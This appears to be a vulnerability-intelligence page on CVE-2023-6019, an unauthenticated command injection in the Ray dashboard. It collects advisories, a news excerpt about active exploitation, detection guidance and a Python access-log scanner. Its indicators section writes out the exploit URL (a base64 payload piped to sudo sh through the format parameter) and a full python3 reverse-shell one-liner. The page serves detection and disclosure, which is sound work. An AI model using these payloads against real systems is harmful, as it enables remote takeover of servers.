CVE-2023-6019
published 2023-11-16
Priority: P183 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 74.63% (99.4th percentile)
A command injection existed in Ray's cpu_profile URL parameter, allowing attackers to execute OS commands remotely, without authentication, on the system running the Ray dashboard. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anyscale | ray | >= 0 < 2.8.1 | 2.8.1 |
| ray-project | ray-project_ray | unspecified – latest | — |
Detection & IOCs
url: /worker/cpu_profile?pid=3354&ip=<ip>&duration=5&native=0&format=`echo <b64_payload> |base64$IFS-d|sudo%20sh`
command: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<lhost>,<lport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
- Monitor HTTP GET requests to the Ray Dashboard endpoint /worker/cpu_profile containing backtick characters or shell metacharacters (e.g., $IFS, base64, sudo) in the `format` query parameter, which indicates command injection exploitation.
- The exploit encodes the reverse shell payload in base64 and injects it via the `format` parameter using backtick command substitution and $IFS to bypass space filtering; detect base64-encoded strings in the `format` URL parameter of requests to /worker/cpu_profile.
- Detect unauthenticated GET requests to the Ray Dashboard (default port 8265) targeting /worker/cpu_profile; the endpoint requires no authentication and is directly exploitable remotely.
- Hunt for reverse shell patterns spawned from the Ray dashboard process, specifically python3 socket-based reverse shells using pty.spawn('/bin/bash'), as these are the payload delivered post-exploitation.
- The Ray Dashboard binds to 0.0.0.0 by default, exposing it publicly if not restricted by firewall rules; Anyscale's own guidance recommends operating Ray within a strictly controlled network environment.
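The first two detection notes above, turned into an access-log check (an added example, not code from Ray or from the sources quoted on this page): it flags requests to /worker/cpu_profile whose `format` value is not a plain token or carries a long base64-like run. The log layout, the allowed-character rule, the 24-character threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate `format` value is a short plain token; anything
# else (backticks, $, |, ;, spaces, ...) is treated as suspicious.
SAFE_FORMAT = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Long base64-looking run, per the second detection note above.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Assumed access-log shape: ... "GET <target> HTTP/1.1" ...
REQUEST = re.compile(r'"(?:GET|HEAD) (\S.*?) HTTP/\d(?:\.\d)?"')

# Constructed sample lines; the base64 run is inert filler (decodes to "AAAA...").
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /worker/cpu_profile'
    '?pid=3354&ip=10.0.0.7&duration=5&native=0&format=flamegraph HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /worker/cpu_profile'
    '?pid=3354&ip=10.0.0.7&duration=5&native=0&format=%60echo%20'
    'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB%7Cbase64$IFS-d%7Csh%60 HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /api/jobs/ HTTP/1.1" 200 88',
]

def check_request_target(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/worker/cpu_profile":
        return []
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key != "format":
            continue
        if not SAFE_FORMAT.fullmatch(value):
            findings.append("format has characters outside [A-Za-z0-9_-]")
        if B64_RUN.search(value):
            findings.append("format has a long base64-like run")
    return findings

def scan(lines):
    """Return [(line_number, findings)] for lines that match the indicators."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = check_request_target(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, "; ".join(findings))
```

The query string is percent-decoded before matching, so encoded backticks (`%60`) and pipes (`%7C`) are caught as well as raw ones.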
CVSS provenance
nvd · v3.1 · 9.8 · CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat · 9.8 · CRITICAL
GHSA
Ray OS Command Injection vulnerability
ghsa·2023-11-16
CVE-2023-6019 [CRITICAL] CWE-78 Ray OS Command Injection vulnerability
A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.
GHSA
Ray Missing Authorization vulnerability
ghsa·2023-11-16
CVE-2023-6020 [CRITICAL] CWE-598 Ray Missing Authorization vulnerability
LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
OSV
Ray OS Command Injection vulnerability
osv·2023-11-16
CVE-2023-6019 [CRITICAL] Ray OS Command Injection vulnerability
A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.
GHSA
Ray Path Traversal vulnerability
ghsa·2023-11-16
CVE-2023-6021 [CRITICAL] CWE-22 Ray Path Traversal vulnerability
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
OSV
Ray Path Traversal vulnerability
osv·2023-11-16
CVE-2023-6021 [CRITICAL] Ray Path Traversal vulnerability
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
OSV
Ray Missing Authorization vulnerability
osv·2023-11-16
CVE-2023-6020 [CRITICAL] Ray Missing Authorization vulnerability
LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
Red Hat
ray: Ray Dashboard Command Injection
vendor_redhat·2025-08-07·CVSS 9.8
CVE-2023-6019 [CRITICAL] CWE-78 ray: Ray Dashboard Command Injection
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
A flaw was found in ray. The `cpu_profile` URL parameter allows for command injection, enabling a remote, unauthenticated attacker to execute arbitrary operating system commands on the system hosting the Ray dashboard. This exploitation occurs directly through a crafted URL. Successful command execution can lead to significant system compromise.
Statement: No Red Hat products
No detection rules found.
Exploit-DB
Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
exploitdb·2024-04-12·CVSS 9.8
CVE-2023-6019 [CRITICAL] Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
---
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://hu
Metasploit
Ray cpu_profile command injection
metasploit
Ray RCE via cpu_profile command injection vulnerability.
Bleepingcomputer
Hackers exploit Ray framework flaw to breach servers, hijack resources
blogs_bleepingcomputer·2024-03-26·CVSS 9.8
CVE-2023-6019 [CRITICAL] Hackers exploit Ray framework flaw to breach servers, hijack resources
## Hackers exploit Ray framework flaw to breach servers, hijack resources
## Bill Toulas
The framework boasts over 30,500 stars on GitHub, and it is used by many organizations worldwide, including Amazon, Spotify, LinkedIn, Instacart, Netflix, Uber, and OpenAI, that use it for training ChatGPT.
## Active exploitation underway
In November 2023, Anyscale disclosed five Ray vulnerabilities, fixing four tracked as CVE-2023-6019, CVE-2023-6020, CVE-2023-6021, and CVE-2023-48023.
However, the fifth bug, a critical remote code execution flaw tracked as CVE-2023-48022, was not fixed because, according to them, its lack of authentication was a long-standing design decision.
"The remaining CVE (CVE-2023-48022) - that Ray does not have authentication built in - is a long-standing design d
Greynoiseio
NoiseLetter October 2024
blogs_greynoiseio